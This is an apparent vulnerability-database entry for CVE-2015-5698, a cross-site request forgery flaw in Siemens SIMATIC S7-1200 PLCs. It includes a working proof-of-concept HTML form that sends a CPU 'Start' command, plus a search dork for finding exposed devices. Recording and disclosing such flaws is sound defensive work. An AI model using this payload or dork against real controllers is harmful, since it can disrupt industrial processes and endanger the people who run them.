ID

VAR-E-201805-0361


CVE

cve_id:CVE-2015-5698

Trust: 1.0

sources: PACKETSTORM: 147789 // PACKETSTORM: 172315

TITLE

Siemens SIMATIC S7-1200 CPU Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 147789

DESCRIPTION

Siemens SIMATIC S7-1200 suffers from a CPU functionality related cross site request forgery vulnerability.

Trust: 0.5

sources: PACKETSTORM: 147789

AFFECTED PRODUCTS

vendor:siemensmodel:simatic s7-1200 cpuscope: - version: -

Trust: 0.5

vendor:siemensmodel:simatic s7-1200scope: - version: -

Trust: 0.5

sources: PACKETSTORM: 147789 // PACKETSTORM: 172315

EXPLOIT

<!--
# Exploit Title: Siemens SIMATIC S7-1200 CPU CSRF Vulnerability
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 21-05-2018
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
# Tested on: Kali Linux
# CVE: CVE-2015- 5698

1. Proof of Concept

-->

<form method="POST" action="http://targetIp/CPUCommands
<http://targetip/CPUCommands>">
<input name="PriNav" value="Start">
<input type="submit" value="Go!">
</form>

<!--

Trust: 0.5

sources: PACKETSTORM: 147789

EXPLOIT HASH

LOCAL

SOURCE

md5: 3918f1d4882eb7d0a69bb075197dc03b
sha-1: 0c8b61aa36289935a74ae48137ba3c94020eb578
sha-256: 8c2e5fb98b7508c36b55a7b3e06dc592c881362ae41570c7b65c00ae8e74bb36
md5: 3918f1d4882eb7d0a69bb075197dc03b

Trust: 0.5

sources: PACKETSTORM: 147789

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 147789

TYPE

csrf

Trust: 1.0

sources: PACKETSTORM: 147789 // PACKETSTORM: 172315

TAGS

tag:exploit

Trust: 1.0

tag:csrf

Trust: 1.0

tag:web

Trust: 0.5

sources: PACKETSTORM: 147789 // PACKETSTORM: 172315

CREDITS

Jameel Nabbo, t4rkd3vilz

Trust: 0.5

sources: PACKETSTORM: 147789

EXTERNAL IDS

db:NVDid:CVE-2015-5698

Trust: 1.0

db:PACKETSTORMid:147789

Trust: 0.5

db:PACKETSTORMid:172315

Trust: 0.5

sources: PACKETSTORM: 147789 // PACKETSTORM: 172315

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2015-5698

Trust: 1.0

sources: PACKETSTORM: 147789 // PACKETSTORM: 172315

SOURCES

db:PACKETSTORMid:147789
db:PACKETSTORMid:172315

LAST UPDATE DATE

2023-12-13T13:37:07.324000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:147789date:2018-05-22T09:22:22
db:PACKETSTORMid:172315date:2023-05-15T15:00:02